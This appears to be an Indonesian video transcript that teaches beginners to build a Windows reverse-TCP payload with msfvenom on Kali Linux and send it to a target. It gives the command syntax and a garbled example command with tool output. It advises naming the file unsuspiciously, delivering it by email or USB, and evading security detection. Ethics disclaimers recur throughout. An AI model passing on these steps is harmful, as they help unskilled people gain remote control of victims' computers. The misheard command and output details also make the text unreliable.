Hai teman-teman, selamat datang di video kita kali ini. Kali ini kita bakal bahas tentang sesuatu yang sangat menarik dan penting di dunia digital, yaitu payload. Apa itu payload? Bayangin kamu lagi ngirim paket ke teman atau keluarga. Di dalam paket itu pasti ada isinya kan? Bisa jadi hadiah, dokumen, atau barang lainnya. Nah, di dunia digital, payload itu mirip dengan isi paket tersebut. Biasanya payload ini berupa kode program yang memiliki fungsi tertentu. Kode ini punya tugas khusus yang harus dijalankan ketika sampai di tujuan. Misalnya, payload bisa digunakan untuk mengambil data penting, atau bahkan mengontrol komputer target dari jarak jauh. Payload ini dikirim melalui jaringan ke komputer target, seperti mengirim paket melalui kurir. Setelah masuk ke komputer target, payload langsung menjalankan tugasnya sesuai perintah yang sudah diprogram. Seru kan? Rasanya seperti menjadi mata-mata digital yang canggih. Tapi, teman-teman, penting banget untuk diingat bahwa ilmu ini harus digunakan untuk kebaikan. Jangan sampai disalahgunakan ya. Di dunia cybersecurity, payload bisa digunakan untuk melindungi sistem kita dari serangan atau untuk menguji keamanan jaringan. Para ahli keamanan sering menggunakan payload untuk melakukan penetration testing, yaitu menguji seberapa kuat sistem keamanan kita. Dengan cara ini, kita bisa menemukan celah keamanan sebelum para penjahat siber menemukannya. Jadi payload bukan hanya alat untuk menyerang, tapi juga bisa menjadi alat yang sangat berguna untuk melindungi. Terus belajar dan pahami lebih dalam tentang dunia cybersecurity, karena pengetahuan adalah kunci untuk melindungi diri kita di dunia digital. Dengan pengetahuan yang tepat, kita bisa menciptakan dunia digital yang lebih aman dan nyaman untuk semua orang. Terima kasih sudah menonton, teman-teman. Sampai jumpa di video berikutnya. Tetap aman dan terus belajar. Sekarang kita bahas kendaraan buat ngirim payload. Kali Linux itu kayak mobil canggih buat hacker. Di dalamnya udah ada banyak peralatan siap pakai. Salah satunya Metasploit Framework. Metasploit ini bengkel buat bikin macem-macem payload. Gampang banget dipakainya. Makanya, Kali Linux jadi favorit para hacker, baik yang masih belajar atau yang udah pro. Sebelum mulai, siapin dulu bahan-bahannya. Pastikan kamu udah install Kali Linux di komputer. Kalau belum, download aja di situs resminya. Tenang, gratis kok. Setelah itu, buka terminal Kali Linux. Terminal ini kayak ruang kendali buat ngasih perintah ke komputer. Siap-siap jadi hacker nih. Di Kali Linux ada senjata andalan buat bikin payload, namanya MSF Venom. MS Venom ini powerful banget. Bisa bikin payload buat macam-macam sistem operasi. Mau Windows, Android, atau macOS, semua bisa. Tinggal pilih cetakan payloadnya aja. MS Venom bakal mencetak payload sesuai keinginan kita. Sekarang, kita belajar bahasa buat ngasih perintah ke MSF Venom. Tenang, nggak susah kok. Strukturnya simple. MSF Venom P jenis payload L-host IP kita, LP ortig buat port kita. -F format file -O nama file. Gampang kan? Tinggal ganti bagian yang ada tanda sesuai kebutuhan. Nanti kita bahas satu persatu. Misalnya, kita mau bikin payload buat Windows. Payload adalah bagian dari perangkat lunak yang dirancang untuk melakukan tugas tertentu. Seringkali tanpa sepengetahuan pengguna. Kita bisa pakai cetakan atau template yang sudah ada untuk membuat payload ini. Dengan menggunakan alat yang tepat, proses ini bisa menjadi lebih mudah dan efisien. Salah satu alat yang bisa kita gunakan adalah Metasploit Framework. Payload ini bakal bikin komputer target terhubung balik ke komputer kita. Ini disebut sebagai reverse connection, di mana komputer target menginisiasi koneksi ke komputer kita. Kita bisa menggunakan perintah berikut. MSF Venom, -p Windows/interpreter/reverse TCP, L-host 22.10, L-port fxo payload exe. Di sini kita menggunakan MS Venom untuk membuat payload. Di sini L-host adalah IP komputer kita, yang akan menjadi alamat tujuan koneksi balik. LP-ort adalah port yang kita buka untuk menerima koneksi dari komputer target. Artinya kita mau bikin file berekstensi .exe, yang bisa dijalankan di sistem operasi Windows. File ini akan berfungsi sebagai payload yang akan kita gunakan untuk mengakses komputer target. Terakhir, kita perlu memberikan nama pada file payloadnya. Nama ini bisa apa saja, tapi sebaiknya sesuatu yang tidak mencurigakan. Setelah file payload dibuat, kita bisa mengirimkannya ke target melalui berbagai metode, seperti email atau USB drive.
Penting untuk diingat bahwa penggunaan payload ini harus dilakukan dengan izin dan untuk tujuan yang sah. Menggunakan payload tanpa izin bisa melanggar hukum dan etika. Jadi, pastikan untuk selalu bertindak sesuai dengan aturan dan regulasi yang berlaku. Setelah menjalankan perintah di atas, MSF Venom akan mencetak payload bernama payload.exe. Proses ini sangat penting dalam dunia cybersecurity, terutama ketika kita berbicara tentang pengujian penetrasi dan eksploitasi sistem. MSF Venom adalah alat yang sangat kuat, yang memungkinkan kita untuk membuat berbagai jenis payload yang dapat digunakan untuk menguji kerentanan dalam sistem. Payload yang dihasilkan ini bisa berupa file executable yang dapat dijalankan di sistem target. Dalam contoh ini, kita membuat payload untuk arsitektur X86, yang merupakan salah satu arsitektur paling umum digunakan. File ini siap dikirim ke komputer target. Proses pengiriman file ini bisa dilakukan melalui berbagai metode, seperti email, USB drive, atau bahkan melalui jaringan. Penting untuk memastikan bahwa file ini sampai ke target tanpa terdeteksi oleh sistem keamanan yang ada. No arch selected. Selecting arch X86 from the payload. Could not find 192.1.1.10 from 122.0.0.2, assuming it's a public IPXE generated, T4.2 bytes. Pesan ini menunjukkan bahwa payload telah berhasil dibuat dan siap untuk digunakan. Ukuran file yang dihasilkan adalah T4.1.2 bytes, yang cukup kecil untuk dikirim melalui berbagai metode. Pesan payload.exe generated menunjukkan bahwa proses pembuatan payload berhasil. Sekarang, payload siap disebar. Langkah selanjutnya adalah mengirimkan payload ini ke target dan menunggu eksekusi. Setelah payload dieksekusi di sistem target, kita bisa mendapatkan akses ke sistem tersebut dan mulai melakukan pengujian lebih lanjut. Ini adalah beberapa penting dari proses pengujian penetrasi yang membantu kita mengidentifikasi dan memperbaiki kerentanan dalam sistem. Cara ngirim payload ke target bisa macam-macam, bisa lewat email, website, atau flash disk. Kalau target buka file payloadnya, komputer mereka bakal terhubung ke komputer kita. Di komputer kita bisa mengendalikan komputer target. Tapi ingat, jangan disalahgunakan ya. Ini cuma buat pembelajaran aja. Buat pemula, ada beberapa tips nih. Selalu update Kali Linux dan Metasploit ke versi terbaru. Pelajari jenis-jenis payload dan fungsinya. Jangan pernah coba-coba di komputer orang lain tanpa izin. Ingat, ilmu hacking itu ibarat pisau. Bisa dipakai buat hal baik, bisa juga buat hal buruk. Pilihan ada di tangan kita. Penting banget buat ingat, hacking tanpa izin itu ilegal dan berbahaya. Jangan pernah nyoba-nyoba hacking ke sistem orang lain tanpa izin. Selain itu, jaga etika dalam belajar hacking. Gunakan ilmu ini untuk kebaikan, misalnya untuk menguji keamanan sistem sendiri. Membuat payload di Kali Linux itu gampang banget kan? Dengan MSF Venom, kita bisa mencetak payload sesuai keinginan. Tapi ingat, gunakan ilmu ini dengan bijak dan bertanggung jawab. Selamat belajar!